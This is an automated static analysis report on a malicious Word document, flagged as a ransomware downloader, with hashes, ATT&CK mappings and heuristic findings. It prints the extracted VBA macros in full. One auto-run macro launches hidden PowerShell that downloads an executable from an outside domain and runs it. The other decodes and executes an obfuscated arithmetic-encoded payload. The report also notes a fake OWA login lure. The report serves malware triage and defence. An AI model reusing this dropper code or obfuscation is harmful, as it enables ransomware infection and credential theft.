Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec09ef78eb093fe5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 165.5 KB
Created: 2017-05-23 21:19:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0f8f0ea4556a1381a0017ada0ad00a99
SHA-1: 481b1f025e110b7dddbca1d9bf0a6f1f7f86b306
SHA-256: ec09ef78eb093fe50416bd94c21969f420e0a68f34a826aac76b2d429c765fd8
Risk score: 450

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample contains a Document_Open VBA macro that uses WScript.Shell to launch a hidden PowerShell command. That command downloads 'wcry.jpg' (likely an executable despite the image extension) from 'https://franchise-tax-board.us/wcry.jpg' with Invoke-WebRequest, writes it to the temporary directory as wcry.exe and then runs it with Start-Process. The document body further lures the user to click 'http://mail.franchise-tax-board.us' for an OWA login, indicating a credential-harvesting or secondary payload-delivery attempt.

Heuristics (12)

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched lines in script:
    Sub Document_Open()
    Set objShell = CreateObject("Wscript.shell")
    objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")
  • PowerShell reference in VBA [critical] OLE_VBA_PS
    Matched lines in script:
    Set objShell = CreateObject("Wscript.shell")
    objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")
    End Sub
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched lines in script:
    Sub Document_Open()
    Set objShell = CreateObject("Wscript.shell")
    objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub Document_Open()
    Set objShell = CreateObject("Wscript.shell")
  • Reference to PowerShell [high] SC_STR_POWERSHELL
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found (all in document text, OLE body):
    • http://mail.franchise-tax-board.us
    • https://franchise-tax-board.us/wcry.jpg
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6162 bytes
SHA-256: 0d45731d0aeac0ac00222e786e96177c9a41c5d234c640a8287d63c54f71c0b9
Detection: ClamAV: No threats found
Obfuscation or payload: likely (the carved artifact contains 3 eval/decoder/string-building tokens)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Set objShell = CreateObject("Wscript.shell")
objShell.Run ("powershell.exe -windowstyle hidden -command ""Invoke-Webrequest -UserAgent 'Ransomware Download' -Uri https://franchise-tax-board.us/wcry.jpg -outfile $env:Temp\wcry.exe; Start-Process $env:Temp\wcry.exe")
End Sub

Attribute VB_Name = "NewMacros"
Sub Document_Open()
Dim CGXzFdxBrkJdJTPOKUVuKEKgPCcIUVGFidtrqYJDxGQnewS, jWUHbtJKDTFjBrSbnuIRHYDNRxgTegNLfixNfSFfYBIzCvu, fSWyFTpVRXVesMxIElSxLXgMPWuKbShhbjytfZQZiBUyIAz
Sub LjJwRcHcqalojdAcNKRkTTPwKQlizuOrlxtUbcRDGtyBcoJ()
CGXzFdxBrkJdJTPOKUVuKEKgPCcIUVGFidtrqYJDxGQnewS = "2357-2274*-3587+3688*9737-9621*5906-5874*346-235*859-761*6566-6460*-9364+9447*7541-7437*" & _
-3998+4099*215028/1991*-9395+9503*52352/1636*7424-7363*118624/3707*-498+565*214776/1884*-89+190*415160/4280*723840/6240*653773/6473*-705+784*116718/1191*" & _
459616/4336*4056-3955*536085/5415*-9706+9822*-6782+6822*70788/2082*659634/7582*5135-5020*6607-6508*2198-2084*3870-3765*599312/5351*-6789+6905*9211-9165*392840/" & _
3416*6773-6669*6638-6537*6815-6707*20952/194*-9923+9957*3951-3910*4312-4302*-7345+7456*2467-2369*987708/9318*1212-1129*188968/1817*-6266+6367*153144/1418*-2287+2395* " & _
-9233+9279*704462/8591*-236+353*587730/5343*5404-5372*2743-2703*282608/8312*968940/9228*-3789+3890*-5292+5412*-1694+1806*6581-6473*6204-6093*9556-9442*4345-4244*-6377+6423*-1440+1541* " & _
-1059+1179*-4575+4676*63872/1996*-9665+9769*208452/1797*-4047+4163*296128/2644*7447-7332*58348/1006*-94+141*101003/2149*8639-8520*5537-5418*7852-7733*5504-5458*-913+1016*-7965+8076*3304-3193*" & _
6452-6349*-5511+5619*286941/2841*367080/7980*5509-5410*256854/2314*4311-4202*9701-9667*-4538+4579*7071-7061*93980/9398*6199-6160*-4516+4627*5408-5294*9753-9721*3343-3303*3185-3119*672792/6936*" & _
-8975+9090*447026/4426*-4789+4843*439088/8444*34400/1075*623372/6172*-5748+5858*451836/4564*-7686+7797*2043-1943*96859/959*-6858+6958*1664-1623*4533-4523*73470/7347*-4242+4281*-4752+4863*-8680+8778*" & _
-7919+8025*5753-5670*623272/5993*877690/8690*-2179+2287*712044/6593*6601-6555*1446-1364*1814-1697*7449-7339*144352/4511*836-796*-3466+3500*8133-8021*-3330+3441*4644-4525*7256-7155*-7548+7662*4236-4121*" & _
9012-8908*232906/2306*7581-7473*1009908/9351*6869-6823*848400/8400*206880/1724*892941/8841*4211-4179*271530/6034*-5513+5632*-4629+4734*1037410/9431*214500/2145*470-359*63665/535*-2542+2657*" & _
5796-5680*482064/3984*8619-8511*-4107+4208*7384-7352*861432/8283*9027-8922*782-682*4488-4388*681447/6747*18370/167*6774-6742*385470/8566*-9228+9329*-353+463*9903-9804*1976-1944*375744/4944*2209-2128*-5225+5291*" & _
-5875+5992*-5394+5459*608470/8570*128128/2288*631800/9720*-1316+14" & _
15*182650/2810*-430+495*-8634+8737*2051-1986*222440/3320*-7396+7444*7893-7828*303-214*4689-4570*9418-9353*8691-8588*7867-7802*331144/4664*-2014+2121*-8313+8378*4072-3982*554121/6841*682-616*-7554+7606*5149-5084*-5251+5318*174791/1697*354055/5447*8004-7920*6505-6402*4391-4325*8360-8252*-704+769*541296/7518*753786/7614*4475-4410*-1186+1262*-3856+3937*518694/7859*1549-1469*1325-1260*-5006+5077*3404-3331*566215/8711*-9647+9744*-2074+2177*-5536+5602*464832/4304*2879-2814*-5021+5092*-2256+2333*-8663+8728*3532-3432*9138-9073*540800/8320*-8037+8140*6752-6687*5671-5602*390312/7506*-1310+1375*523350/5815*-5275+5356*316404/4794*-348+396*-727+792*5020-4953*-4922+4974*-6087+6152*75508/878*-9460+9579*1140-1074*617760/5720*351520/5408*-3652+3723*8699-8626*-2051+2116*314766/3886*400911/3369*562386/8521*-4666+4781*95160/1464*140793/1983*863383/8069*137085/2109*5797-5707*282123/3483*6499-6433*276822/2366*9961-9896*4047-3975*-7921+8002*248-183*-8749+8824*358992/4432*-3420+3485*909324/7772*6676-6611*6588-6519*76545/945*-1597+16
62*740292/7554*5081-4962*185460/2810*8265-8214*345215/5311*-7586+7657*467636/8993*631345/9713*325850/3325*5077-5012*-1222+1288*-3846+3964*195650/3010*5689-5618*1728-1659*-5040+5105*534060/5934*-2500+2565*6597-6531*634368/7552*65390/1006*-3486+3558*-3639+3720*2659-2594*-5235+5334*5169-5066*-5521+5587*782320/6985*614640/9456*404061/5691*359840/6920*-3568+3633*9048-8958*-4052+4171*1794-1729*6063-5952*155415/2391*2174-2107*-5642+5741*547625/8425*501587/5171*350415/5391*6189-6123*5117-5069*4155-4090*957-885*3007-2926*8043-7978*-526+625*630565/9701*583310/8974*363960/6740*6225-6160*748-681*2423-2367*8156-8091*227696/2996*-7078+7197*4680-4615*586680/4889*-1608+1673*-5751+5819*-9575+9682*3467-3402*-743+820*-4177+4280*-2437+2502*196326/1678*-5633+5698*1674-1606*-9562+9631*34710/534*2248-2170*3408-3305*-1940+2005*-8436+8488*31200/480*-6827+6894*928-876*6580-6515*1521-1444*142140/1380*2361-2296*1111-989*-9296+9361*-6665+6733*770337/7479*249080/3832*299896/3946*1524-1421*7580-7515*761160/6343*6358-6293*182716/2687*-8810
+8887*-7221+7286*-9896+9973*7325-7222*-2944+3009*6352-6234*3362-3297*18815/265*330561/4293*613340/9436*551251/5683*-8787+8852*-5585+5651*-1052+1160*-5312+5377*-4725+4796*-7704+7781*-4764+4829*9857-9760*-9494+9613*540-474*1087408/9709*595400/9160*1757-1685*-4345+4410*336570/5178*3862-3786*-5807+5910*-2903+2969*405360/8445*6040-5975*684288/9504*219184/2128*-8974+9039*402100/4021*6242-6177*8739-8674*-17+127*-2073+2138*594960/8880*224272/2096*631800/9720*3434/101*-4844+4885"
jWUHbtJKDTFjBrSbnuIRHYDNRxgTegNLfixNfSFfYBIzCvu = Split(CGXzFdxBrkJdJTPOKUVuKEKgPCcIUVGFidtrqYJDxGQnewS, Chr(eVaL(248934 / 5927)))
For Each VJdAgXbGGUOXqKMytedxMVjoVEtCHYATqAbxwvtSsYRowPF In jWUHbtJKDTFjBrSbnuIRHYDNRxgTegNLfixNfSFfYBIzCvu
fSWyFTpVRXVesMxIElSxLXgMPWuKbShhbjytfZQZiBUyIAz = fSWyFTpVRXVesMxIElSxLXgMPWuKbShhbjytfZQZiBUyIAz & Chr(eVaL(VJdAgXbGGUOXqKMytedxMVjoVEtCHYATqAbxwvtSsYRowPF))
Next
zSJmAhYKVhhyGCHMQAVFuoXlWEiSLcAuLzNzlsAEQOnKAOJ
End Sub
Sub zSJmAhYKVhhyGCHMQAVFuoXlWEiSLcAuLzNzlsAEQOnKAOJ()
eVaL (Execute(fSWyFTpVRXVesMxIElSxLXgMPWuKbShhbjytfZQZiBUyIAz))
End Sub
LjJwRcHcqalojdAcNKRkTTPwKQlizuOrlxtUbcRDGtyBcoJ
End Sub